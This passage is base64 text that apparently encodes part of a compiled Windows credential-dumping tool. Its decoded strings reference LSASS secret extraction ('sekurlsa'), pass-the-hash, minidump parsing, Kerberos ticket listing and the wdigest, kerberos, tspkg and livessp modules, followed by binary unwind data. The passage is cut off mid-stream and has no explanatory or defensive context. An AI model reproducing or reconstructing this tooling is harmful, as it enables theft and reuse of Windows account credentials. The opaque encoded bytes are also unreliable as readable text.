FUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAGUAbABlAG0AZQBuAHQAcwAgAGYAcgBvAG0AIABjAG8AbAB1AG0AbgA6ACAAJQB1AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAcgBlAGYAZQByAGUAbgBjAGUAcwAgAGYAcgBvAG0AIABjAG8AbAB1AG0AbgA6ACAAJQB1AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIAByAGUAZgBlAHIAZQBuAGMAZQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIABmAGkAcgBzAHQAIABlAGwAZQBtAGUAbgB0AAoAAAAAAAAAbABzAGEAcwByAHYAAAAAAExzYUlDYW5jZWxOb3RpZmljYXRpb24AAExzYUlSZWdpc3Rlck5vdGlmaWNhdGlvbgAAAAAAAAAAYgBjAHIAeQBwAHQAAAAAAEJDcnlwdE9wZW5BbGdvcml0aG1Qcm92aWRlcgAAAAAAQkNyeXB0U2V0UHJvcGVydHkAAAAAAAAAQkNyeXB0R2V0UHJvcGVydHkAAAAAAAAAQkNyeXB0R2VuZXJhdGVTeW1tZXRyaWNLZXkAAAAAAABCQ3J5cHRFbmNyeXB0AAAAQkNyeXB0RGVjcnlwdAAAAEJDcnlwdERlc3Ryb3lLZXkAAAAAAAAAAEJDcnlwdENsb3NlQWxnb3JpdGhtUHJvdmlkZXIAAAAAMwBEAEUAUwAAAAAAAAAAAEMAaABhAGkAbgBpAG4AZwBNAG8AZABlAEMAQgBDAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAAAAAAAAAAABPAGIAagBlAGMAdABMAGUAbgBnAHQAaAAAAAAAAAAAAEEARQBTAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBGAEIAAABDAGEAYwBoAGUAZABVAG4AbABvAGMAawAAAAAAAAAAAEMAYQBjAGgAZQBkAFIAZQBtAG8AdABlAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAAAEMAYQBjAGgAZQBkAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAAAAAAAABSAGUAbQBvAHQAZQBJAG4AdABlAHIAYQBjAHQAaQB2AGUAAAAAAAAATgBlAHcAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAABOAGUAdAB3AG8AcgBrAEMAbABlAGEAcgB0AGUAeAB0AAAAAAAAAAAAVQBuAGwAbwBjAGsAAAAAAFAAcgBvAHgAeQAAAAAAAABTAGUAcgB2AGkAYwBlAAAAQgBhAHQAYwBoAAAAAAAAAE4AZQB0AHcAbwByAGsAAABJAG4AdABlAHIAYQBjAHQAaQB2AGUAAABVAG4AawBuAG8AdwBuACAAIQAAAAAAAABVAG4AZABlAGYAaQBuAGUAZABMAG8AZwBvAG4AVAB5AHAAZQAAAAAATABpAHMAdAAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAE0AYQBuAGEAZwBlAHIAAAAAAAAAAABjAHIAZQBkAG0AYQBuAAAATABpAHMAdAAgAEMAYQBjAGgAZQBkACAATQBhAHMAdABlAHIASwBlAHkAcwAAAAAAZABwAGEAcABpAAAAAAAAAEwAaQBzAHQAIABLAGUAcgBiAGUAcgBvAHMAIABFAG4AYwByAHkAcAB0AGkAbwBuACAASwBlAHkAcwAAAAAAAABlAGsAZQB5AHMAAAAAAAAATABpAHMAdAAgAEsAZQByAGIAZQByAG8AcwAgAHQAaQBjAGsAZQB0AHMAAAAAAAAAdABpAGMAawBlAHQAcwAAAFAAYQBzAHMALQB0AGgAZQAtAGgAYQBzAGgAAAAAAAAAcAB0AGgAAABTAHcAaQB0AGMAaAAgACgAbwByACAAcgBlAGkAbgBpAHQAKQAgAHQAbwAgAEwAUwBBAFMAUwAgAG0AaQBuAGkAZAB1AG0AcAAgAGMAbwBuAHQAZQB4AHQAAAAAAAAAAABtAGkAbgBpAGQAdQBtAHAAAAAAAAAAAAAAAAAAAAAAAFMAdwBpAHQAYwBoACAAKABvAHIAIAByAGUAaQBuAGkAdAApACAAdABvACAATABTAEEAUwBTACAAcAByAG8AYwBlAHMAcwAgACAAYwBvAG4AdABlAHgAdAAAAAAAAAAAAEwAaQBzAHQAcwAgAGEAbABsACAAYQB2AGEAaQBsAGEAYgBsAGUAIABwAHIAbwB2AGkAZABlAHIAcwAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAABsAG8AZwBvAG4AUABhAHMAcwB3AG8AcgBkAHMAAAAAAEwAaQBzAHQAcwAgAFMAUwBQACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAAAHMAcwBwAAAATABpAHMAdABzACAATABpAHYAZQBTAFMAUAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAABsAGkAdgBlAHMAcwBwAAAATABpAHMAdABzACAAVABzAFAAawBnACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAdABzAHAAawBnAAAAAAAAAEwAaQBzAHQAcwAgAEsAZQByAGIAZQByAG8AcwAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAATABpAHMAdABzACAAVwBEAGkAZwBlAHMAdAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAAB3AGQAaQBnAGUAcwB0AAAATABpAHMAdABzACAATABNACAAJgAgAE4AVABMAE0AIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABtAHMAdgAAAAAAAAAAAAAAUwBvAG0AZQAgAGMAbwBtAG0AYQBuAGQAcwAgAHQAbwAgAGUAbgB1AG0AZQByAGEAdABlACAAYwByAGUAZABlAG4AdABpAGEAbABzAC4ALgAuAAAAAAAAAFMAZQBrAHUAcgBMAFMAQQAgAG0AbwBkAHUAbABlAAAAcwBlAGsAdQByAGwAcwBhAAAAAAAAAAAAUwB3AGkAdABjAGgAIAB0AG8AIABQAFIATwBDAEUAUwBTAAoAAAAAAFMAdwBpAHQAYwBoACAAdABvACAATQBJAE4ASQBEAFUATQBQACAAOgAgAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBtAGkAbgBpAGQAdQBtAHAAIAA7ACAAPABtAGkAbgBpAGQAdQBtAHAAZgBpAGwAZQAuAGQAbQBwAD4AIABhAHIAZwB1AG0AZQBuAHQAIABpAHMAIABtAGkAcwBzAGkAbgBnAAoAAAAAAAAAAAAAAAAAAAAAAE8AcABlAG4AaQBuAGcAIAA6ACAAJwAlAHMAJwAgAGYAaQBsAGUAIABmAG8AcgAgAG0AaQBuAGkAZAB1AG0AcAAuAC4ALgAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEwAUwBBAFMAUwAgAHAAcgBvAGMAZQBzAHMAIABuAG8AdAAgAGYAbwB1AG4AZAAgACgAPwApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATQBpAG4AaQBkAHUAbQBwACAAcABJAG4AZgBvAHMALQA+AE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAAKAAlAHUAKQAgACEAPQAgAE0ASQBNAEkASwBBAFQAWgBfAE4AVABfAE0AQQBKAE8AUgBfAFYARQBSAFMASQBPAE4AIAAoACUAdQApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIABwAEkAbgBmAG8AcwAtAD4AUAByAG8AYwBlAHMAcwBvAHIAQQByAGMAaABpAHQAZQBjAHQAdQByAGUAIAAoACUAdQApACAAIQA9ACAAUABSAE8AQwBFAFMAUwBPAFIAXwBBAFIAQwBIAEkAVABFAEMAVABVAFIARQBfAEEATQBEADYANAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIAB3AGkAdABoAG8AdQB0ACAAUwB5AHMAdABlAG0ASQBuAGYAbwBTAHQAcgBlAGEAbQAgACgAPwApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAASwBlAHkAIABpAG0AcABvAHIAdAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATABvAGcAbwBuACAAbABpAHMAdAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATQBvAGQAdQBsAGUAcwAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGUAbQBvAHIAeQAgAG8AcABlAG4AaQBuAGcACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAASABhAG4AZABsAGUAIABvAG4AIABtAGUAbQBvAHIAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAG8AYwBhAGwAIABMAFMAQQAgAGwAaQBiAHIAYQByAHkAIABmAGEAaQBsAGUAZAAKAAAAAAAAAAAACQAlAHMAIAA6AAkAAAAAAAoAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACAASQBkACAAOgAgACUAdQAgADsAIAAlAHUAIAAoACUAMAA4AHgAOgAlADAAOAB4ACkACgBTAGUAcwBzAGkAbwBuACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAAZgByAG8AbQAgACUAdQAKAFUAcwBlAHIAIABOAGEAbQBlACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAEQAbwBtAGEAaQBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAKAFMASQBEACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAHIAdQBuAAAAAAAAAAAAAAB1AHMAZQByAAkAOgAgACUAcwAKAGQAbwBtAGEAaQBuAAkAOgAgACUAcwAKAHAAcgBvAGcAcgBhAG0ACQA6ACAAJQBzAAoAAABBAEUAUwAxADIAOAAJADoAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAEEARQBTADEAMgA4ACAAawBlAHkAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAzADIAIAAoADEANgAgAGIAeQB0AGUAcwApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAEEARQBTADEAMgA4ACAAawBlAHkAIABvAG4AbAB5ACAAcwB1AHAAcABvAHIAdABlAGQAIABmAHIAbwBtACAAVwBpAG4AZABvAHcAcwAgADgALgAxACAAKABvAHIAIAA3AC8AOAAgAHcAaQB0AGgAIABrAGIAMgA4ADcAMQA5ADkANwApAAoAAABBAEUAUwAyADUANgAJADoAIAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAQQBFAFMAMgA1ADYAIABrAGUAeQAgAGwAZQBuAGcAdABoACAAbQB1AHMAdAAgAGIAZQAgADYANAAgACgAMwAyACAAYgB5AHQAZQBzACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAQQBFAFMAMgA1ADYAIABrAGUAeQAgAG8AbgBsAHkAIABzAHUAcABwAG8AcgB0AGUAZAAgAGYAcgBvAG0AIABXAGkAbgBkAG8AdwBzACAAOAAuADEAIAAoAG8AcgAgADcALwA4ACAAdwBpAHQAaAAgAGsAYgAyADgANwAxADkAOQA3ACkACgAAAG4AdABsAG0AAAAAAAAAAABOAFQATABNAAkAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABuAHQAbABtACAAaABhAHMAaAAgAGwAZQBuAGcAdABoACAAbQB1AHMAdAAgAGIAZQAgADMAMgAgACgAMQA2ACAAYgB5AHQAZQBzACkACgAAACAAIAB8ACAAIABQAEkARAAgACAAJQB1AAoAIAAgAHwAIAAgAFQASQBEACAAIAAlAHUACgAAAAAAIAAgAHwAIAAgAEwAVQBJAEQAIAAlAHUAIAA7ACAAJQB1ACAAKAAlADAAOAB4ADoAJQAwADgAeAApAAoAAAAAACAAIABcAF8AIABtAHMAdgAxAF8AMAAgACAAIAAtACAAAAAAAAAAAAAgACAAXABfACAAawBlAHIAYgBlAHIAbwBzACAALQAgAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAFcAaQB0AGgATABvAGcAbwBuAFcAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAE0AaQBzAHMAaQBuA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CgAMAB4ACUAMAA4AHgAKQAKAAAACgAgACAAIABcAF8AIAAqAFAAYQBzAHMAdwBvAHIAZAAgAHIAZQBwAGwAYQBjAGUAIAAtAD4AIAAAAAAAAAAAAG4AdQBsAGwAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGsAZQByAGIAZQByAG8AcwBfAGUAbgB1AG0AXwB0AGkAYwBrAGUAdABzACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAtACUAdwBaAEAAJQB3AFoALQAlAHcAWgAuACUAcwAAAAAAWwAlAHgAOwAlAHgAXQAtACUAMQB1AC0AJQB1AC0AJQAwADgAeAAuACUAcwAAAAAAbABpAHYAZQBzAHMAcAAuAGQAbABsAAAAQ3JlZGVudGlhbEtleXMAAFByaW1hcnkACgAJACAAWwAlADAAOAB4AF0AIAAlAFoAAAAAAAAAAABkAGEAdABhACAAYwBvAHAAeQAgAEAAIAAlAHAAIAA6ACAAAAAAAAAATwBLACAAIQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbQBzAHYAXwBlAG4AdQBtAF8AYwByAGUAZABfAGMAYQBsAGwAYgBhAGMAawBfAHAAdABoACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAuAAAAAAAAAAAAAAAAAAAAbgAuAGUALgAgACgASwBJAFcASQBfAE0AUwBWADEAXwAwAF8AUABSAEkATQBBAFIAWQBfAEMAUgBFAEQARQBOAFQASQBBAEwAUwAgAEsATwApAAAAAAAAAAAAAAAAAAAAbgAuAGUALgAgACgASwBJAFcASQBfAE0AUwBWADEAXwAwAF8AQwBSAEUARABFAE4AVABJAEEATABTACAASwBPACkAAAAAAAAAdABzAHAAawBnAC4AZABsAGwAAAAAAAAAdwBkAGkAZwBlAHMAdAAuAGQAbABsAAAAAQkDAAkBpgACMAAAAQ4BAA5CAAABFAIAFFIQcAEWCgAWVAsAFjQKABYyEuAQ0A7ADHALYAEGAgAGMgJQGRgFABgBKAARcBBgDzAAAIrLAQAJAAAA/ZYBABmXAQAu7QEAGZcBADKXAQBMlwEAju0BAEyXAQBplwEAg5cBAO7tAQCDlwEAoZcBALCXAQBO7gEAsJcBAMOXAQDSlwEAru4BANKXAQDxlwEA/ZcBAA7vAQD9lwEAGZgBADOYAQBu7wEAM5gBAF2YAQB0mAEAzu8BAHSYAQDKlgEAepgBAC7wAQAAAAAAAQ8GAA9kBwAPNAYADzILcAEMAgAMAREAARgIABhkCAAYVAcAGDQGABgyFHAZGgYAC5IHwAVwBGADUAIwsJEBAEAAAAAZFwQACHIEcANgAjCwkQEAOAAAABkpCwAXNF8AFwFUABDwDuAM0ArACHAHYAZQAACwkQEAmAIAAAEPBgAPZA8ADzQOAA+yC3ABBgIABjICMBkpCwAXNJ8AFwGUABDwDuAM0ArACHAHYAZQAACwkQEAkAQAAAEUCAAUZBAAFFQPABQ0DgAUshBwGSMKABQ0FAAUshDwDuAM0ArACHAHYAZQsJEBAFAAAAABHAwAHGQSABxUEQAcNBAAHJIY8BbgFNASwBBwGSsLABk0gQAZAXYAEvAQ4A7QDMAKcAlgCFAAALCRAQCgAwAACQQBAARCAACKywEAAQAAAB/MAQBSzAEAR/ABAFLMAQABCgQACjQIAAoyBnABFAgAFHIQ8A7gDNAKwAhwB2AGMBkhCAASVAkAEjQIABIyDtAMcAtgsJEBABAAAAAZKQsAFzQeABcBFAAQ8A7gDNAKwAhwB2AGUAAAsJEBAJAAAAAZGwQADDQQAAyyCHCwkQEAWAAAAAEXCAAXZAsAF1QKABc0CQAXUhNwAQ8GAA9kCQAPNAgADzILcBkhCAASVA0AEjQMABJSDsAMcAtgsJEBACgAAAABBAEABMIAAAEGAgAGkgIwAQkBAAniAAABGAEAGKIAAAEXAQAXogAAARoCABoBFQABDQMADQE+AAZwAAABHAsAHHQpABxkKAAcVCcAHDQmABwBJAAVwAAAAQ0FAA0BGAAGcAVgBDAAAAEfDAAfZA8AH1QOAB80DAAfUhvwGeAX0BXAE3ABDAQADDQIAAxSCHABGAoAGGQMABhUCwAYNAoAGFIU0BLAEHABBAEABIIAAAEUCAAUZAkAFFQIABQ0BwAUMhBwARgIABhkDgAYVA0AGDQMABiSFHABHQwAHXQNAB1kDAAdVAsAHTQKAB1SGeAX0BXAASAMACBkDwAgVA0AIDQMACBSHPAa4BjQFsAUcAEUCAAUZAkAFFQHABQ0BgAUMhBwAQoEAAo0BwAKMgZwAQoEAAo0BgAKMgZwARwMABxkEAAcVA8AHDQOABxyGPAW4BTQEsAQcAEdDAAddA8AHWQOAB1UDQAdNAwAHXIZ4BfQFcABGQoAGXQRABlkEAAZVA8AGTQOABmyFcABHAwAHGQMABxUCwAcNAoAHDIY8BbgFNASwBBwAREGABE0DQARcg1wDGALUAEcCwAcxB8AHHQeABxkHQAcNBwAHAEaABXQAAABBAEABEIAAAEZAwAZQhVwFDAAAAEPBgAPZAkADzQIAA9SC3ABBgIABlICMAEPBgAPZAcAD1QGAA8yC3ABCgQACjQMAAqSBnABIAwAIGQTACBUEgAgNBEAIJIc8BrgGNAWwBRwARIIABJUDwASNAwAEnIOwAxwC2ABCAIACHIEMAELAgAL8gQwARIIABJUCwASNAoAElIOwAxwC2ABBgIABtICMAEPBgAPZA0ADzQMAA+SC3ABGwoAG2QXABtUFQAbNBQAG/IU0BLAEHABGwoAG2QWABtUFQAbNBQAG/IU0BLAEHABEAYAEGQNABA0DAAQkgxwARsLABtkGgAbVBkAGzQYABsBFAAU0BLAEHAAAAEYCgAYZBQAGFQTABg0EgAY0hTQEsAQcAEYCgAYZBMAGFQRABg0EAAYshTQEsAQcAEOBgAONAsADlIKcAlgCFABFwsAFzQcABcBFAAQ8A7gDNAKwAhwB2AGUAAAARYKABZUEwAWNBIAFrIS8BDQDsAMcAtgAQ8GAA9kCwAPNAoAD3ILcAETBAATNAYAEzIPcAEdCwAdNC8AHQEkABbwFOAS0BDADnANYAxQAAABGQgAGXIV4BPQEcAPcA5gDVAMMAEYCgAYZAoAGFQJABg0CAAYMhTQEsAQcAEIAgAI0gQwAQsGAAtSB8AFcARgA1ACMAEhCwAhZFRAIVRTQCE0UkAhAU5AFNASwBBwAAABFgoAFjQOABZSEvAQ4A7QDMAKcAlgCFABFQgAFXQJABVkBwAVVAYAFTIRwAEGAgAGcgIwAQwEAAw0CwAMcghwARkKABl0DQAZZAwAGVQLABk0CgAZchXAARQGABRkDgAUNAwAFJIQcAEOAgAOMgowARIIABJUEwASNBAAErIOwAxwC2ABEQYAETQUABHyCnAJYAhQARcLABc0IQAXARgAEPAO4AzQCsAIcAdgBlAAAAEEAQAEogAAARkKABl0CQAZZAgAGVQHABk0BgAZMhXAARoHABpkFwAaNBYAGgEUABNwAAABGwsAG2QeABtUHQAbNBwAGwEYABTQEsAQcAAAARoLABpUIQAaNCAAGgEaABPwEdAPwA1wDGAAAAEbCQAbVB8AGzQeABsBGgAU0BLAEHAAAAEaCwAaVB0AGjQcABoBFgAT4BHQD8ANcAxgAAABEggAEjQQABKSDtAMwApwCWAIUAEXCQAXZBcAF1QVABc0FAAXARIAEHAAAAEWCQAWVBsAFjQaABYBFgAPwA1wDGAAAAEKAgAKAUkAAQgCAAiSBDABHQwAHXQLAB1kCgAdVAkAHTQIAB0yGeAX0BXAASAMACBkDwAgVA4AIDQMACBSHPAa4BjQFsAUcAESBgASNBEAErIOcA1gDFABHQsAHTQkAB0BHAAW8BTgEtAQwA5wDWAMUAAAARoJABpkGwAaVBoAGjQYABoBFgATcAAAARcJABdkGgAXVBkAFzQYABcBFgAQcAAAARMIABNUDwATNA4AE5IPwA1wDGABGwoAG2QXABtUFgAbNBUAG/IU0BLAEHABFAgAFGQNABRUDAAUNAsAFHIQcAEbCwAbZBgAG1QXABs0FgAbARIAFNASwBBwAAABFgoAFjQWABbSEvAQ4A7QDMAKcAlgCFABEwgAE1QTABM0EgAT0g/ADXAMYAEZCwAZNCgAGQEeABLwEOAO0AzACnAJYAhQAAABHw0AH2QqAB9UKQAfNCgAHwEiABjwFuAU0BLAEHAAAAEhCwAhNCYAIQEeABrwGOAW0BTAEnARYBBQAAABGAoAGGQSABhUEQAYNBAAGLIU0BLAEHABEAYAEGQLABA0CgAQcgxwAQ4EAA40BwAOMgpwARIEABI0CgASUg5wAQsGAAtSB9AFcARgA1ACMAESCAASNBQAEtIO0AzACnAJYAhQARkKABk0DwAZMhXwE+AR0A/ADXAMYAtQARoLABpUIAAaNB8AGgEYABPgEdAPwA1wDGAAAAEbCwAbZBkAG1QXABs0FgAbARIAFNASwBBwAAABHw0AH2RDAB9UQgAfNEEAHwE6ABjwFuAU0BLAEHAAAAEaBgAaNBMAGrIWcBVgFFABBAEABOIAAAETBwATZBcAEzQWABMBFAAMcAAAARQIABRkEgAUVBEAFDQQABTSEHABEAYAEGQSABA0EQAQ0gxwARwMABxkFQAcVBQAHDQTAByyGPAW4BTQEsAQcAETCAATZA4AEzQNABNyD9ANwAtwARQIABRkEwAUVBIAFDQRABTSEHABDAQADDQRAAzSCHABGQsAGTQwABkBKAAS8BDgDtAMwApwCWAIUAAAARQIABRkCgAUVAkAFDQIABRSEHABFAgAFGQOABRUDQAUN